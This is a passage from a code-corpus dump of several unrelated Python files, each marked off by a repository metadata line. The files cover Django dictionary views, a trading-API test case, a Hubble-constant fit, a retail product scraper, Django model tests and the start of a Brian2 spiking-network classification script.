newvalue = morph_def.role.english_name
elif what == 'morphology_definition_morpheme':
morpheme = gloss_from_identifier(value)
if morpheme:
morph_def.morpheme = morpheme
morph_def.save()
newvalue = str(morpheme)
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Badly formed gloss identifier"), value,
content_type='text/plain')
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain')
return HttpResponse(newvalue, content_type='text/plain')
@permission_required('dictionary.change_gloss')
def add_tag(request, glossid):
"""View to add a tag to a gloss"""
# default response
response = HttpResponse('invalid', content_type='text/plain')
if request.method == "POST":
gloss = get_object_or_404(Gloss, id=glossid)
if 'view_dataset' not in get_perms(request.user, gloss.dataset):
# If user has no permissions to dataset, raise PermissionDenied to show 403 template.
msg = _("You do not have permissions to add tags to glosses of this lexicon.")
messages.error(request, msg)
raise PermissionDenied(msg)
form = TagDeleteForm(request.POST)
if form.is_valid():
if form.cleaned_data['delete']:
tag = form.cleaned_data['tag']
# get the relevant TaggedItem
ti = get_object_or_404(
TaggedItem, object_id=gloss.id, tag__name=tag,
content_type=ContentType.objects.get_for_model(Gloss))
ti.delete()
response = HttpResponse(
'deleted', content_type='text/plain')
return response
form = TagUpdateForm(request.POST)
if form.is_valid():
tag = form.cleaned_data['tag']
# we need to wrap the tag name in quotes since it might contain spaces
Tag.objects.add_tag(gloss, '"%s"' % tag)
# response is new HTML for the tag list and form
response = render(request, 'dictionary/glosstags.html',
{'gloss': gloss, 'tagsaddform': TagsAddForm()})
else:
# If we are adding (multiple) tags, this form should validate.
form = TagsAddForm(request.POST)
if form.is_valid():
tags = form.cleaned_data['tags']
[Tag.objects.add_tag(gloss, str(x)) for x in tags]
response = render(request, 'dictionary/glosstags.html',
{'gloss': gloss, 'tagsaddform': TagsAddForm()})
return response
@login_required
@permission_required('dictionary.import_csv')
def import_gloss_csv(request):
"""
Check which objects exist and which not. Then show the user a list of glosses that will be added if user confirms.
Store the glosses to be added into sessions.
"""
glosses_new = []
glosses_exists = []
# Make sure that the session variables are flushed before using this view.
if 'dataset_id' in request.session: del request.session['dataset_id']
if 'glosses_new' in request.session: del request.session['glosses_new']
if request.method == 'POST':
form = CSVUploadForm(request.POST, request.FILES)
if form.is_valid():
dataset = form.cleaned_data['dataset']
if 'view_dataset' not in get_perms(request.user, dataset):
# If user has no permissions to dataset, raise PermissionDenied to show 403 template.
msg = _("You do not have permissions to import glosses to this lexicon.")
messages.error(request, msg)
raise PermissionDenied(msg)
try:
glossreader = csv.reader(codecs.iterdecode(form.cleaned_data['file'], 'utf-8'), delimiter=',', quotechar='"')
except csv.Error as e:
# Can't open file, remove session variables
if 'dataset_id' in request.session: del request.session['dataset_id']
if 'glosses_new' in request.session: del request.session['glosses_new']
# Set a message to be shown so that the user knows what is going on.
messages.add_message(request, messages.ERROR, _('Cannot open the file: ') + str(e))
return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': CSVUploadForm()}, )
else:
try:
for row in glossreader:
if glossreader.line_num == 1:
# Skip first line of CSV file.
continue
try:
# Find out if the gloss already exists, if it does add to list of glosses not to be added.
gloss = Gloss.objects.get(dataset=dataset, idgloss=row[0])
glosses_exists.append(gloss)
except Gloss.DoesNotExist:
# If gloss is not already in list, add glossdata to list of glosses to be added as a tuple.
if not any(row[0] in s for s in glosses_new):
glosses_new.append(tuple(row))
except IndexError:
# If row[0] does not exist, continue to next iteration of loop.
continue
except UnicodeDecodeError as e:
# File is not UTF-8 encoded.
messages.add_message(request, messages.ERROR, _('File must be UTF-8 encoded!'))
return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': CSVUploadForm()}, )
# Store dataset's id and the list of glosses to be added in session.
request.session['dataset_id'] = dataset.id
request.session['glosses_new'] = glosses_new
return render(request, "dictionary/import_gloss_csv_confirmation.html",
{#'import_csv_form': CSVUploadForm(),
'glosses_new': glosses_new,
'glosses_exists': glosses_exists,
'dataset': dataset,})
else:
# If form is not valid, set a error message and return to the original form.
messages.add_message(request, messages.ERROR, _('The provided CSV-file does not meet the requirements '
'or there is some other problem.'))
return render(request, "dictionary/import_gloss_csv.html", {'import_csv_form': form}, )
else:
# If request type is not POST, return to the original form.
csv_form = CSVUploadForm()
allowed_datasets = get_objects_for_user(request.user, 'dictionary.view_dataset')
# Make sure we only list datasets the user has permissions to.
csv_form.fields["dataset"].queryset = csv_form.fields["dataset"].queryset.filter(
id__in=[x.id for x in allowed_datasets])
return render(request, "dictionary/import_gloss_csv.html",
{'import_csv_form': csv_form}, )
@login_required
@permission_required('dictionary.import_csv')
def confirm_import_gloss_csv(request):
"""This view adds the data to database if the user confirms the action"""
if request.method == 'POST':
if 'cancel' in request.POST:
# If user cancels adding data, flush session variables
if 'dataset_id' in request.session: del request.session['dataset_id']
if 'glosses_new' in request.session: del request.session['glosses_new']
# Set a message to be shown so that the user knows what is going on.
messages.add_message(request, messages.WARNING, _('Cancelled adding CSV data.'))
return HttpResponseRedirect(reverse('dictionary:import_gloss_csv'))
elif 'confirm' in request.POST:
glosses_added = []
dataset = None
if 'glosses_new' in request.session and 'dataset_id' in request.session:
dataset = Dataset.objects.get(id=request.session['dataset_id'])
for gloss in request.session['glosses_new']:
# If the Gloss does not already exist, continue adding.
if not Gloss.objects.filter(dataset=dataset, idgloss=gloss[0]).exists():
try:
new_gloss = Gloss(dataset=dataset, idgloss=gloss[0], idgloss_en=gloss[1],
created_by=request.user, updated_by=request.user)
except IndexError:
# If we get IndexError, idgloss_en was probably not provided
new_gloss = Gloss(dataset=dataset, idgloss=gloss[0],
created_by=request.user, updated_by=request.user)
new_gloss.save()
glosses_added.append((new_gloss.idgloss, new_gloss.idgloss_en))
# Flush request.session['glosses_new'] and request.session['dataset']
del request.session['glosses_new']
del request.session['dataset_id']
# Set a message to be shown so that the user knows what is going on.
messages.add_message(request, messages.SUCCESS, _('Glosses were added successfully.'))
return render(request, "dictionary/import_gloss_csv_confirmation.html", {'glosses_added': glosses_added,
'dataset': dataset.name})
else:
return HttpResponseRedirect(reverse('dictionary:import_gloss_csv'))
else:
# If request method is not POST, redirect to the import form
return HttpResponseRedirect(reverse('dictionary:import_gloss_csv'))
def gloss_relation(request):
"""Processes Gloss Relations"""
if request.method == "POST":
form = GlossRelationForm(request.POST)
if "delete" in form.data:
glossrelation = get_object_or_404(GlossRelation, id=int(form.data["delete"]))
if 'view_dataset' not in get_perms(request.user, glossrelation.source.dataset):
# If user has no permissions to dataset, raise PermissionDenied to show 403 template.
msg = _("You do not have permissions to delete relations from glosses of this lexicon.")
messages.error(request, msg)
raise PermissionDenied(msg)
ct = ContentType.objects.get_for_model(GlossRelation)
# Delete TaggedItems and the GlossRelation
TaggedItem.objects.filter(object_id=glossrelation.id, content_type=ct).delete()
glossrelation.delete()
if "HTTP_REFERER" in request.META:
return redirect(request.META["HTTP_REFERER"])
return redirect("/")
if form.is_valid():
source = get_object_or_404(Gloss, id=form.cleaned_data["source"])
if 'view_dataset' not in get_perms(request.user, source.dataset):
# If user has no permissions to dataset, raise PermissionDenied to show 403 template.
msg = _("You do not have permissions to add relations to glosses of this lexicon.")
messages.error(request, msg)
raise PermissionDenied(msg)
target = get_object_or_404(Gloss, id=form.cleaned_data["target"])
glossrelation = GlossRelation.objects.create(source=source, target=target)
if form.cleaned_data["tag"]:
Tag.objects.add_tag(glossrelation, form.cleaned_data["tag"].name)
if "HTTP_REFERER" in request.META:
return redirect(request.META["HTTP_REFERER"])
return redirect("/")
return HttpResponseBadRequest("Bad request.")
return HttpResponseForbidden()
| authors: ["[email protected]"] |
| /Autocase_Result/ETFMM_K/YW_ETFMM_SZSJ_408_K.py | repo: nantongzyg/xtp_test | no_license | Python |
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_ETFMM_SZSJ_408_K(xtp_test_case):
# YW_ETFMM_SZSJ_408_K
def test_YW_ETFMM_SZSJ_408_K(self):
title = 'Shenzhen A-share, trading day, best-five immediate-or-cancel sell order - wrong business type'
# Define the expected values for this test case
# Expected status: initial, untraded, partially filled, fully filled, partial-cancel reported, partially cancelled, reported pending cancel, cancelled, rejected (invalid order), cancel rejected, internal cancel
# xtp_ID and cancel_xtpID default to 0 and do not need to be changed
case_goal = {
'期望状态': '废单',
'errorID': 11000370,
'errorMSG': queryOrderErrorMsg(11000370),
'是否生成报单': '否',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# Define the order parameters ------------------------------------------
# Parameters: security code, market, security type, security status, trading status, side (B=buy, S=sell), expected status, Api
stkparm = QueryStkPriceQty('999999', '2', '14', '2', '0', 'S', case_goal['期望状态'], Api)
# If fetching the order parameters fails, the test case fails
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': 'failed to get order parameters, ' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_IPOS'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_CANCEL'],
'price': stkparm['随机中间价'],
'quantity': 200,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('execution result: ' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
| authors: ["[email protected]"] |
| /2015/AST1/vezbovni/David/habl.py | repo: ispastlibrary/Titan | no_license | Python |
import numpy as np
# import matplotlib.pyplot as plt
d, V, wi, deltav = np.loadtxt('habl.txt', unpack=True)
sum_wi = np.sum(wi)
sum_wy = np.sum(wi * V)
sum_wx = np.sum(wi * d)
sum_wxy = np.sum(wi * d * V)
sum_wx2 = np.sum(wi * d * d)
b = (sum_wxy * sum_wi - sum_wy * sum_wx) / (sum_wi * sum_wx2 - sum_wx**2)
print(b)
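# Background for the fit above (a sketch; assumes wi are the fit weights,
# e.g. wi = 1/deltav**2, d is distance and V is recession velocity):
# for the weighted straight-line fit V = a + b*d the normal equations give
#   b = (S*Sxy - Sx*Sy) / (S*Sxx - Sx**2),   a = (Sy - b*Sx) / S
# with S = sum(wi), Sx = sum(wi*d), Sy = sum(wi*V), Sxy = sum(wi*d*V) and
# Sxx = sum(wi*d*d); b is the Hubble-constant estimate. Its uncertainty:
#   delta_b = np.sqrt(sum_wi / (sum_wi * sum_wx2 - sum_wx**2))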
| authors: ["[email protected]"] |
| /special_crawler/extract_statelinetack_data.py | repo: dankCodeNugs/tmtext | no_license | Python |
#!/usr/bin/python
import urllib
import re
import sys
import json
from lxml import html, etree
import time
import requests
from extract_data import Scraper
class StateLineTackScraper(Scraper):
'''
NOTES :
no_image examples:
http://www.statelinetack.com/item/horseware-pony-liner-200g/E012435/
'''
##########################################
############### PREP
##########################################
# holds data from an external request, fetched lazily
bazaar = None
INVALID_URL_MESSAGE = "Expected URL format is http://www.statelinetack.com/item/<product-name>/<product-id>/"
def check_url_format(self):
"""Checks product URL format for this scraper instance is valid.
Returns:
True if valid, False otherwise
"""
#m = re.match("^http://www.amazon.com/dp/[a-zA-Z0-9]+$", self.product_page_url)
m = re.match(r"^http://www.statelinetack.com/.*?$", self.product_page_url)
return not not m
##########################################
############### CONTAINER : NONE
##########################################
def _url(self):
return self.product_page_url
def _event(self):
return None
def _product_id(self):
product_id = self.tree_html.xpath('//input[@id="ctl00_ctl00_CenterContentArea_MainContent_HidBaseNo"]/@value')[0]
return product_id
def _site_id(self):
return None
def _status(self):
return "success"
##########################################
############### CONTAINER : PRODUCT_INFO
##########################################
def _product_name(self):
a = self.tree_html.xpath('//*[@itemprop="name"]/text()')[0]
if a is not None and len(a)>3:
return a
return self._product_title()
def _product_title(self):
return self.tree_html.xpath("//meta[@property='og:title']/@content")[0]
def _title_seo(self):
return self.tree_html.xpath("//title//text()")[0].strip()
def _model(self):
return None
def _upc(self):
return None
def _features(self):
desc, feat = self._feature_helper()
return feat
def _feature_count(self):
desc, feat = self._feature_helper()
return len(feat)
def _feature_helper(self):
tree = self.tree_html
tree = str(etree.tostring(tree))
# take care of some crazy spacing issues around <strong> tags
tree = re.sub(r'\s*<strong>\s*(.*)\s*</strong>\s*', r'\1', tree)
tree = re.sub(r'\n', '', tree)
tree = html.fromstring(tree)
full_description = [x.strip() for x in tree.xpath('//div[@id="ItemPageProductSummaryBoxMain"]//div[@class="GreyBoxMiddle"]//text()') if len(x.strip())>0]
full_description = [x for x in full_description if len(x)>3]
feat_index = [i for i in range(len(full_description)) if re.findall(r'^.{0,10}(F|f)eatures.{0,4}$', full_description[i])]
spec_index = [i for i in range(len(full_description)) if re.findall(r'^.{0,10}(S|s)pecifications.{0,4}$', full_description[i])]
if len(feat_index)>0:
feat_index = feat_index[0]
else:
feat_index = 0
if len(spec_index)>0:
spec_index = spec_index[0]
else:
spec_index = None
if spec_index>0:
feat = full_description[feat_index+1:spec_index]
else:
feat = full_description[feat_index+1:]
if feat_index>0:
desc = full_description[0:feat_index]
else:
desc = full_description[0]
if isinstance(desc, str) or isinstance(desc, unicode):
temp = []
temp.append(desc)
desc = temp
return desc, feat
def _model_meta(self):
return None
def _description(self):
# description = ([x.strip() for x in self.tree_html.xpath('//div[@id="ItemPageProductSummaryBoxMain"]//div[@class="GreyBoxMiddle"]//text()') if len(x.strip())>0])
# for row in range(0,6):
# if len(description[row]) > 3:#to avoid the heading "product description"
# return description[row]
# return None
desc, feat = self._feature_helper()
return ' '.join(desc)
def _long_description(self):
return None
##########################################
############### CONTAINER : PAGE_ATTRIBUTES
##########################################
def _no_image(self):
return None
def _mobile_image_same(self):
return None
def _image_urls(self):
#metaimg comes from meta tag
#metaimg = self.tree_html.xpath('//meta[@property="og:image"]/@content')
#imgurl comes from the carousel
imageurl = self.tree_html.xpath('//img[@class="swatch"]/@src')
if(len(imageurl) == 0):
imageurl = self.tree_html.xpath('//meta[@property="og:image"]/@content')
return imageurl
def _image_count(self):
imgurls = self._image_urls()
return len(imgurls)
def _video_urls(self):
#"url":"http://ecx.images-amazon.com/images/I/B1d2rrt0oJS.mp4"
video_url = self.tree_html.xpath('//script[@type="text/javascript"]')
temp = []
for v in video_url:
r = re.findall("[\'\"]url[\'\"]:[\'\"](http://.+?\.mp4)[\'\"]", str(v.xpath('.//text()')))
if r:
temp.extend(r)
return temp
def _video_count(self):
return len(self._video_urls())
def _pdf_urls(self):
moreinfo = self.tree_html.xpath('//div[@class="ItemPageDownloadableResources"]//div//a/@href')
pdfurl = []
for a in moreinfo:
p = re.findall(r'(.*\.pdf)', a)
pdfurl.extend(p)
baseurl = 'http://www.statelinetack.com/'
pdfurl = [baseurl + x[1:] for x in pdfurl]
return pdfurl
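# Note: the join above assumes every matched href is site-relative and
# starts with '/'. A more defensive variant (a sketch using the Python 2
# stdlib) would be:
#   import urlparse
#   pdfurl = [urlparse.urljoin('http://www.statelinetack.com/', u) for u in pdfurl]
# urljoin also handles absolute URLs and missing leading slashes.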
def _pdf_count(self):
return len(self._pdf_urls())
def _webcollage(self):
return None
def _htags_from_tree(self):
htags_dict = {}
# add h1 tags text to the list corresponding to the "h1" key in the dict
htags_dict["h1"] = map(lambda t: self._clean_text(t), self.tree_html.xpath("//h1//text()[normalize-space()!='']"))
# add h2 tags text to the list corresponding to the "h2" key in the dict
htags_dict["h2"] = map(lambda t: self._clean_text(t), self.tree_html.xpath("//h2//text()[normalize-space()!='']"))
return htags_dict
def _keywords(self):
return None
##########################################
############### CONTAINER : REVIEWS
##########################################
#bazaar for ratings
def get_bazaar(self):
if self.bazaar != None:
return self.bazaar
else:
url = 'http://tabcomstatelinetack.ugc.bazaarvoice.com/3421-en_us/%s/reviews.djs?format=embeddedhtml'
url = url % (self._product_id())
contents = urllib.urlopen(url).read()
# tree = re.findall(r'var materials=(\{.*?\}.*\})', contents)[0]
# tree = re.sub(r'\\(.)', r'\1', tree)
# tree = re.findall(r'(\<.*\>)', tree)[0]
# tree = html.fromstring(contents)
return contents
#extract average review, and total reviews
def _average_review(self):
bazaar = self.get_bazaar()
# avg = bazaar.xpath('//*[contains(@class, "BVRRRatingNumber")]//text()')
# avg = re.findall(r'<span class=\\"BVRRNumber BVRRRatingRangeNumber\\">(.*?)<\\/span>', bazaar)
avg = re.findall(r'<span class=\\"BVRRNumber BVRRRatingNumber\\">([0-9.]*?)<\\/span>', bazaar)
return avg[0]
def _review_count(self):
bazaar = self.get_bazaar()
# num = bazaar.xpath('//*[contains(@class, "BVRRRatingRangeNumber")]//text()')
num = re.findall(r'\<span class\=\\"BVRRNumber\\"\>([0-9]*?)\<\\/span\> review', bazaar)
return num[0]
def _max_review(self):
return None
def _min_review(self):
return None
##########################################
############### CONTAINER : SELLERS
##########################################
def _price(self):
price = self.tree_html.xpath("//span[@id='lowPrice']//text()")
if price:
return price[0].strip()
return None
def _in_stores_only(self):
return None
def _in_stores(self):
return None
def _owned(self):
return 1
def _owned_out_of_stock(self):
return None
def _marketplace(self):
return 0
def _marketplace_sellers(self):
return None
def _marketplace_lowest_price(self):
return None
##########################################
############### CONTAINER : SELLERS
##########################################
def _category_name(self):
all = self._categories()
all = map(lambda t: self._clean_text(t), all)
return all[-1]
def _categories(self):
all = self.tree_html.xpath('//div[@id="ItemPageBreadCrumb"]//a/text()')
return all
def _brand(self):
return None
#########################################
################ HELPER FUNCTIONS
##########################################
# clean text inside html tags - remove html entities, trim spaces
def _clean_text(self, text):
return re.sub(" ", " ", text).strip()
##########################################
################ RETURN TYPES
##########################################
# dictionaries mapping type of info to be extracted to the method that does it
# also used to define types of data that can be requested to the REST service
DATA_TYPES = { \
# CONTAINER : NONE
"url" : _url, \
"event" : _event, \
"product_id" : _product_id, \
"site_id" : _site_id, \
"status" : _status, \
# CONTAINER : PRODUCT_INFO
"product_name" : _product_name, \
"product_title" : _product_title, \
"title_seo" : _title_seo, \
"model" : _model, \
"upc" : _upc,\
"features" : _features, \
"feature_count" : _feature_count, \
"model_meta" : _model_meta, \
"description" : _description, \
"long_description" : _long_description, \
# CONTAINER : PAGE_ATTRIBUTES
"image_urls" : _image_urls, \
"image_count" : _image_count, \
"video_urls" : _video_urls, \
"video_count" : _video_count, \
"pdf_urls" : _pdf_urls, \
"pdf_count" : _pdf_count, \
"webcollage" : _webcollage, \
"htags" : _htags_from_tree, \
"keywords" : _keywords, \
# CONTAINER : REVIEWS
"average_review" : _average_review, \
"review_count" : _review_count, \
"max_review" : _max_review, \
"min_review" : _min_review, \
# CONTAINER : SELLERS
"price" : _price, \
"in_stores_only" : _in_stores_only, \
"in_stores" : _in_stores, \
"owned" : _owned, \
"owned_out_of_stock" : _owned_out_of_stock, \
"marketplace": _marketplace, \
"marketplace_sellers" : _marketplace_sellers, \
"marketplace_lowest_price" : _marketplace_lowest_price, \
# CONTAINER : CLASSIFICATION
"categories" : _categories, \
"category_name" : _category_name, \
"brand" : _brand, \
"loaded_in_seconds": None \
}
# special data that can't be extracted from the product page
# associated methods return already built dictionary containing the data
DATA_TYPES_SPECIAL = { \
"mobile_image_same" : _mobile_image_same, \
"no_image" : _no_image,\
}
# def _anchors_from_tree(self):
# description_node = self.tree_html.xpath('//div[contains(@class, "GreyBoxMiddle")]/div/span/span/span/div[3]')[0]
# links = description_node.xpath(".//a")
# nr_links = len(links)
# links_dicts = []
# for link in links:
# links_dicts.append({"href" : link.xpath("@href")[0], "text" : link.xpath("text()")[0]})
# ret = {"quantity" : nr_links, "links" : links_dicts}
# return ret
# def _seller_meta_from_tree(self):
# return self.tree_html.xpath("//meta[@itemprop='brand']/@content")[0]
# def _meta_description(self):
# return self.tree_html.xpath("//meta[@name='Description']/@content")[0]
# def _meta_keywords(self):
# return self.tree_html.xpath("//meta[@name='Keywords']/@content")[0]
# def main(args):
# # check if there is an argument
# if len(args) <= 1:
# sys.stderr.write("ERROR: No product URL provided.\nUsage:\n\tpython crawler_service.py <amazon_product_url>\n")
# sys.exit(1)
# product_page_url = args[1]
# # check format of page url
# if not check_url_format(product_page_url):
# sys.stderr.write(INVALID_URL_MESSAGE)
# sys.exit(1)
# return json.dumps(product_info(sys.argv[1], ["name", "short_desc", "keywords", "price", "load_time", "anchors", "long_desc"]))
| authors: ["[email protected]"] |
| /jirani/tests.py | repo: cliffnyendwe/neighbourhood | MIT | Python |
from django.test import TestCase
from django.contrib.auth.models import User
from .models import Neighborhood, Profile, Business
# Create your tests here.
class TestUser(TestCase):
def setUp(self):
self.testuser = User(username="user", email="[email protected]")
def test_instance(self):
self.assertIsInstance(self.testuser, User)
def test_save_user(self):
self.assertFalse(self.testuser in User.objects.all())
self.testuser.save()
self.assertTrue(self.testuser in User.objects.all())
def test_save_profile(self):
self.fuser = User(username="fuser", email="[email protected]")
self.fuser.save()
self.assertTrue(self.fuser in User.objects.all())
| authors: ["cliffnyendwe"] | author_id: cliffnyendwe |
| /algorithms/python/knmf/hdf5/__init__.py | repo: Joaggi/Robust-kernels-for-robust-location-estimation | Apache-2.0 | Python |
from h5OnlineReader import *
| authors: ["[email protected]"] |
| /Brian2_scripts/sim_brian_scratch/sim_brian_Jv/sim_brian_Jv_v1_BO.py | repo: zhouyanasd/DL-NC | no_license | Python |
# ----------------------------------------
# LSM without STDP for Jv test
# add neurons to readout layer for multi-classification(one-versus-the-rest)
# using softmax(logistic regression)
# input layer is changed to 781*1 with encoding method
# change the LSM structure according to Maass paper
# new calculation flow as in Maass_ST
# simplify the coding method by only extending the rank
# for BO runs in parallel
# ----------------------------------------
from brian2 import *
from brian2tools import *
import scipy as sp
from scipy import stats
import struct
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import accuracy_score
import pickle
from bqplot import *
import ipywidgets as widgets
import warnings
import os
from multiprocessing import Pool
import cma
import bayes_opt
from functools import partial
warnings.filterwarnings("ignore")
prefs.codegen.target = "numpy"
start_scope()
np.random.seed(100)
data_path = '../../../Data/Jv/'
# ------define general function------------
class Function():
def __init__(self):
pass
def logistic(self, f):
return 1 / (1 + np.exp(-f))
def softmax(self, z):
return np.array([(np.exp(i) / np.sum(np.exp(i))) for i in z])
def gamma(self, a, size):
return stats.gamma.rvs(a, size=size)
class Base():
def update_states(self, type='pandas', *args, **kwargs):
for seq, state in enumerate(kwargs):
if type == 'pandas':
kwargs[state] = kwargs[state].append(pd.DataFrame(args[seq]))
elif type == 'numpy':
kwargs[state] = self.np_extend(kwargs[state], args[seq], 1)
return kwargs
def normalization_min_max(self, arr):
arr_n = arr
for i in range(arr.size):
x = float(arr[i] - np.min(arr)) / (np.max(arr) - np.min(arr))
arr_n[i] = x
return arr_n
def mse(self, y_test, y):
return sp.sqrt(sp.mean((y_test - y) ** 2))
def classification(self, thea, data):
data_n = self.normalization_min_max(data)
data_class = []
for a in data_n:
if a >= thea:
b = 1
else:
b = 0
data_class.append(b)
return np.asarray(data_class), data_n
def allocate(self, G, X, Y, Z):
V = np.zeros((X, Y, Z), [('x', float), ('y', float), ('z', float)])
V['x'], V['y'], V['z'] = np.meshgrid(np.linspace(0, X - 1, X), np.linspace(0, Y - 1, Y),
np.linspace(0, Z - 1, Z), indexing='ij')
V = V.reshape(X * Y * Z)
np.random.shuffle(V)
n = 0
for g in G:
for i in range(g.N):
g.x[i], g.y[i], g.z[i] = V[n][0], V[n][1], V[n][2]
n += 1
return G
def w_norm2(self, n_post, Synapsis):
for i in range(n_post):
a = Synapsis.w[np.where(Synapsis._synaptic_post == i)[0]]
Synapsis.w[np.where(Synapsis._synaptic_post == i)[0]] = a / np.linalg.norm(a)
def np_extend(self, a, b, axis=0):
if a is None:
shape = list(b.shape)
shape[axis] = 0
a = np.array([]).reshape(tuple(shape))
return np.append(a, b, axis)
def np_append(self, a, b):
shape = list(b.shape)
shape.insert(0, -1)
if a is None:
a = np.array([]).reshape(tuple(shape))
return np.append(a, b.reshape(tuple(shape)), axis=0)
def parameters_GS(self, *args, **kwargs):
#---------------
# args = [(min,max),]
# kwargs = {'parameter' = number,}
#---------------
parameters = np.zeros(tuple(kwargs.values()), [(x, float) for x in kwargs.keys()])
grids = np.meshgrid(*[np.linspace(min_max[0], min_max[1], scale)
for min_max,scale in zip(args,kwargs.values())], indexing='ij')
for index, parameter in enumerate(kwargs.keys()):
parameters[parameter] = grids[index]
parameters = parameters.reshape(-1)
return parameters
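# Usage sketch for parameters_GS (hypothetical values): a 2x3 grid over two
# parameters, returned as a flat structured array:
#   grid = base.parameters_GS((0.1, 2.0), (0.1, 1.0), R=2, f=3)
#   grid['R']  # -> [0.1, 0.1, 0.1, 2.0, 2.0, 2.0]
#   grid['f']  # -> [0.1, 0.55, 1.0, 0.1, 0.55, 1.0]
# Note the positional (min, max) bounds must be given in the same order as
# the keyword scales.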
class Readout():
def readout_sk(self, X_train, X_test, y_train, y_test, **kwargs):
from sklearn.linear_model import LogisticRegression
lr = LogisticRegression(**kwargs)
lr.fit(X_train.T, y_train.T)
y_train_predictions = lr.predict(X_train.T)
y_test_predictions = lr.predict(X_test.T)
return accuracy_score(y_train_predictions, y_train.T), accuracy_score(y_test_predictions, y_test.T)
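# Shape convention (as used below in parameters_search): X_train/X_test are
# (n_features, n_samples) -- state vectors stored column-wise, hence the
# transposes above -- and y_train/y_test are 1-d label arrays; **kwargs are
# forwarded to sklearn's LogisticRegression, e.g.
#   readout.readout_sk(X_tr, X_te, y_tr, y_te, solver="lbfgs", multi_class="multinomial")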
class Result():
def __init__(self):
pass
def result_save(self, path, *arg, **kwarg):
if os.path.exists(path):
os.remove(path)
fw = open(path, 'wb')
pickle.dump(kwarg, fw)
fw.close()
def result_pick(self, path):
fr = open(path, 'rb')
data = pickle.load(fr)
fr.close()
return data
def animation(self, t, v, interval, duration, a_step=10, a_interval=100, a_duration=10):
xs = LinearScale()
ys = LinearScale()
line = Lines(x=t[:interval], y=v[:, :interval], scales={'x': xs, 'y': ys})
xax = Axis(scale=xs, label='x', grid_lines='solid')
yax = Axis(scale=ys, orientation='vertical', tick_format='0.2f', label='y', grid_lines='solid')
fig = Figure(marks=[line], axes=[xax, yax], animation_duration=a_duration)
def on_value_change(change):
line.x = t[change['new']:interval + change['new']]
line.y = v[:, change['new']:interval + change['new']]
play = widgets.Play(
interval=a_interval,
value=0,
min=0,
max=duration,
step=a_step,
description="Press play",
disabled=False
)
slider = widgets.IntSlider(min=0, max=duration)
widgets.jslink((play, 'value'), (slider, 'value'))
slider.observe(on_value_change, names='value')
return play, slider, fig
class Jv_classification():
def __init__(self, coding_duration):
self.coding_duration = coding_duration
def load_Data_Jv(self, t, path_value, path_label, is_norm=True):
if t == "train":
label = np.loadtxt(path_label, delimiter=None).astype(int)[1]
elif t == "test":
label = np.loadtxt(path_label, delimiter=None).astype(int)[0]
else:
raise TypeError("t must be 'train' or 'test'")
data = np.loadtxt(path_value, delimiter=None)
if is_norm:
data = MinMaxScaler().fit_transform(data)
s = open(path_value, 'r')
i = -1
size = []
while True:
lines = s.readline()
i += 1
if not lines:
break
if lines == '\n': # "\n" needed to be added at the end of the file
i -= 1
size.append(i)
continue
size_d = np.concatenate(([0], (np.asarray(size) + 1)))
data_list = [data[size_d[i]:size_d[i + 1]] for i in range(len(size_d) - 1)]
label_list = []
j = 0
for n in label:
label_list.extend([j] * n)
j += 1
data_frame = pd.DataFrame({'value': pd.Series(data_list), 'label': pd.Series(label_list)})
return data_frame
def load_Data_Jv_all(self, path, is_norm=True):
self.train = self.load_Data_Jv('train', path + 'train.txt',
path + 'size.txt', is_norm)
self.test = self.load_Data_Jv('test', path + 'test.txt',
path + 'size.txt', is_norm)
def select_data(self, fraction, data_frame, is_order=True, **kwargs):
try:
selected = kwargs['selected']
except KeyError:
selected = np.arange(9)
if is_order:
data_frame_selected = data_frame[data_frame['label'].isin(selected)].sample(
frac=fraction).sort_index().reset_index(drop=True)
else:
data_frame_selected = data_frame[data_frame['label'].isin(selected)].sample(frac=fraction).reset_index(
drop=True)
return data_frame_selected
def _encoding_cos(self, x, n, A):
encoding = []
for i in range(int(n)):
trans_cos = np.around(0.5 * A * (np.cos(x + np.pi * (i / n)) + 1)).clip(0, A - 1)
coding = [([0] * trans_cos.shape[1]) for i in range(A * trans_cos.shape[0])]
for index_0, p in enumerate(trans_cos):
for index_1, q in enumerate(p):
coding[int(q) + A * index_0][index_1] = 1
encoding.extend(coding)
return np.asarray(encoding)
def _encoding_cos_rank(self, x, n, A):
encoding = np.zeros((x.shape[0] * A, n * x.shape[1]), dtype='<i1')
for i in range(int(n)):
trans_cos = np.around(0.5 * A * (np.cos(x + np.pi * (i / n)) + 1)).clip(0, A - 1)
for index_0, p in enumerate(trans_cos):
for index_1, q in enumerate(p):
encoding[int(q) + A * index_0, index_1 * n + i] = 1
return np.asarray(encoding)
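# Shape sketch for the rank encoding above (an assumed small example): an
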